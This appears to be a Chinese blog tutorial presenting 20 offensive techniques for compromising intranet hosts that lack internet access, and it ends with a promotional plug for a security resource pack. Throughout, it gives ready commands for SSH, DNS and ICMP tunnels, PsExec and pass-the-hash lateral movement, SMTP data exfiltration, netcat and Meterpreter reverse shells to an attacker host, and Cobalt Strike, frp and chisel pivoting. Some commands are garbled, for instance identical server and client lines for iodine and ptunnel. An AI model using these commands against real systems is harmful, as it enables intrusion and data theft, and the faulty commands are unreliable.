内网渗透骚操作：20招教你突破“与世隔绝”的目标主机

内网渗透骚操作：20招教你突破“与世隔绝”的目标主机

内网渗透，那可是个技术活儿，尤其是当目标主机“与世隔绝”，压根儿不让上网的时候。这时候，就得拿出点真本事，各种奇技淫巧、工具轮番上阵。今儿个，咱就来聊聊，如何在目标主机不出网的情况下，还能把它“拿下”的20种骚操作，保证让您大开眼界！

一、隧道与代理：内网穿梭的“任意门”

（一）端口转发：流量乾坤大挪移

端口转发，就像是给流量开了个“任意门”，让它在不同的主机之间穿梭。

1. 1. 本地端口转发（Local Port Forwarding）

   简单来说，就是把目标主机上的服务“搬”到咱自己电脑上。 比如，想访问内网里的数据库服务器，可以用SSH端口转发：

   bash ssh -L 3306:192.168.1.100:3306 user@middle_host

   这条命令一敲，目标主机192.168.1.100的MySQL服务（3306端口）就跟咱本地的3306端口“喜结连理”了，直接访问本地端口就成！

2. 2. 远程端口转发（Remote Port Forwarding）

   要是目标主机“害羞”，不肯主动找咱，那就让它把流量“反弹”给咱。 举个栗子：

   bash ssh -R 8080:localhost:80 user@attack_host

   这下，目标主机上的HTTP服务（80端口）就乖乖地跑到咱电脑的8080端口上“做客”了。

（二）代理隧道：网络限制？不存在的！

代理隧道，顾名思义，就是通过代理服务器，绕过各种网络限制。

1. 3. Socks代理

   有了Socks代理，就像给咱的流量穿上了“隐身衣”。 比如，用proxychains配合代理服务器，扫描内网主机：

   bash proxychains nmap -sT -Pn internal_host

   这样，咱就能神不知鬼不觉地摸清内网的底细了。

2. 4. HTTP代理

   把代理脚本“藏”在目标服务器上，就能建立起一条秘密通道。 reGeorg和Proxifier就是干这事儿的好手。

（三）DNS隧道：在DNS的海洋里“偷渡”

DNS隧道，就是把数据“伪装”成DNS请求，偷偷地溜出去。 就算HTTP、HTTPS这些“大路”被堵死了，DNS这条“小道”往往还能走通。iodine和dnscat2是常用的DNS隧道工具。

1. 5. 使用iodine构建DNS隧道

   在攻击者主机上启动DNS服务器：

   bash iodine -f -c -P password example.com

   在目标主机上运行客户端：

   bash iodine -f -c -P password example.com

   数据就这样在DNS的“掩护”下，悄悄地完成了传输。

（四）ICMP隧道：Ping也能传数据？

ICMP隧道，就是利用ICMP流量（比如Ping）来传输数据，绕过防火墙。 有时候，TCP/UDP流量被“拒之门外”，但ICMP可能还“畅通无阻”。Ptunnel和icmpsh是常用的ICMP隧道工具。

1. 6. 使用Ptunnel构建ICMP隧道

   在攻击者主机上启动Ptunnel：

   bash ptunnel -p 80 -lp 22 -da 192.168.1.100 -dp 22

   在目标主机上启动客户端：

   bash ptunnel -p 80 -lp 22 -da 192.168.1.100 -dp 22

   数据就这样在ICMP的“庇护”下，安全地完成了传输。

二、内网服务：突破的“隐秘角落”

（五）内网横向移动：步步为营，扩大战果

内网横向移动，就是利用内网里的“薄弱环节”，比如弱口令、漏洞啥的，一步步“蚕食”其他主机。

1. 7. 使用PsExec远程执行命令

   bash PsExec.exe \192.168.1.100 -u user -p password cmd.exe

   PsExec一出马，就能在其他内网主机上“为所欲为”了。

2. 8. Pass-the-Hash攻击

   有了哈希值，就不用密码也能“畅行无阻”。 比如：

   bash pth-winexe -U user%hash //192.168.1.100 cmd.exe

   pth-winexe一出手，Pass-the-Hash攻击轻松搞定。

（六）利用内网服务：另辟蹊径，出奇制胜

目标主机上可能藏着一些“宝藏”，比如数据库服务、文件共享服务，利用它们，说不定就能找到突破口。

1. 9. 利用内网数据库服务

   通过数据库服务，也能和外面的世界“搭上线”。 比如，利用MySQL的LOAD DATA INFILE功能，把数据写到文件里，再想办法“运”出去。

2. 10. 利用SMB隧道

   SMB隧道，就是利用内网文件共享服务来传输数据。 比如：

   bash smbclient //192.168.1.100/share -U user

   SMB客户端一连，内网文件共享服务就“尽在掌握”了。

（七）邮件、FTP等协议：曲线救国，柳暗花明

有些内网环境，虽然封了HTTP/HTTPS，但可能还留着其他“后门”，比如邮件、FTP。

1. 11. 使用SMTP协议发送电子邮件

   用SMTP协议发邮件，把数据“寄”出去。 比如：

   bash echo "Data to exfiltrate" | mail -s "Subject" user@example.com

   数据就这样“飞”出去了。

2. 12. 使用FTP上传或下载文件

   用FTP上传或下载文件，也是个不错的选择。 比如：

   bash ftp -i 192.168.1.100

   文件就这样“搬家”了。

三、反向连接：让目标主机“主动投怀送抱”

（八）反向Shell和反向隧道：主动出击，建立连接

反向Shell和反向隧道，就是让目标主机主动来找咱，建立起“爱的桥梁”。

1. 13. 使用Netcat建立反向Shell

   在目标主机上运行：

   bash nc -e /bin/sh attack_host 4444

   在攻击者主机上监听：

   bash nc -l -p 4444

   Netcat一出手，反向Shell就到手。

2. 14. 使用Metasploit建立反向Shell

   在目标主机上运行：

   bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=attack_host LPORT=4444 -f exe -o shell.exe

   在攻击者主机上运行：

   bash msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost attack_host; set lport 4444; run"

   Metasploit一出马，反向Shell更是不在话下。

（九）Cobalt Strike的中转功能： “隐形的翅膀”

Cobalt Strike，内网渗透的“神器”，它的Socks代理功能，能让目标主机在“与世隔绝”的情况下，也能通过中转，建立起代理连接。

1. 15. 使用Cobalt Strike的Socks代理

   在目标主机上运行Beacon，通过Socks代理功能建立代理连接。例如：

   bash beacon> socks 8080

   在攻击者主机上使用代理工具连接到目标主机。

（十）SMB Beacon：隐蔽通信的“秘密武器”

SMB Beacon，Cobalt Strike里的“特种兵”，通过Windows命名管道通信，隐蔽性极高。

1. 16. 使用SMB Beacon

   创建一个SMB的Listener后，可以在主Beacon上链接或断开子Beacon。例如：

   bash beacon> smb 192.168.1.100 445

   通过SMB Beacon建立连接。

四、工具与脚本：渗透利器，各显神通

（十一）reGeorg和Neo-reGeorg：代理隧道的“双子星”

reGeorg，代理隧道工具的“老大哥”，把脚本上传到目标服务器的网站目录下，就能建立起代理隧道。 Neo-reGeorg更是在此基础上加了“buff”，数据传输更隐蔽。

1. 17. 使用reGeorg建立代理隧道

   在目标服务器上上传reGeorg脚本：

   bash curl -o proxy.py http://example.com/reGeorg.py

   在攻击者主机上运行代理客户端：

   bash python proxy.py -s http://192.168.1.100/reGeorg.py -l 8080 -r 192.168.1.200:80

   通过reGeorg建立代理隧道。

（十二）Pystinger：WebShell的“好搭档”

Pystinger，通过WebShell实现内网SOCK4代理，端口映射，让目标主机在“与世隔绝”的情况下也能“重见天日”。

1. 18. 使用Pystinger建立代理

   将stinger_server.exe上传到目标服务器，并在公网VPS上运行stinger_client，建立代理连接。例如：

   bash python stinger_client.py -s 192.168.1.100 -p 8080 -l 8081

   通过Pystinger建立代理连接。

（十三）Frp：内网穿透的“瑞士军刀”

Frp，内网穿透工具的“扛把子”，在目标主机“与世隔绝”的情况下，通过已控的双网卡内网服务器，打通一条“生命通道”。

1. 19. 使用Frp建立内网穿透

   在目标主机上运行Frp客户端：

   bash ./frpc -c frpc.ini

   在攻击者主机上运行Frp服务端：

   bash ./frps -c frps.ini

   通过Frp建立内网穿透。

（十四）其他工具和脚本：渗透工具箱的“百宝囊”

除了上面这些，还有很多其他的工具和脚本，也能在内网渗透中“大显身手”。

1. 20. 使用Chisel建立隧道

   Chisel，轻量级隧道工具，内网穿透的“小能手”。 比如：

   在目标主机上运行：

   bash ./chisel client --reverse attack_host:8080 R:8081:localhost:80

   在攻击者主机上运行：

   bash ./chisel server --port 8080 --reverse

   通过Chisel建立隧道。

学习计划安排

这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包，需要的小伙伴可以扫描下方优快云官方合作二维码免费领取哦，无偿分享！！！

如果你对网络安全入门感兴趣，那么你需要的话可以

点击这里👉网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！

①网络安全学习路线
②上百份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥HW护网行动经验总结
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析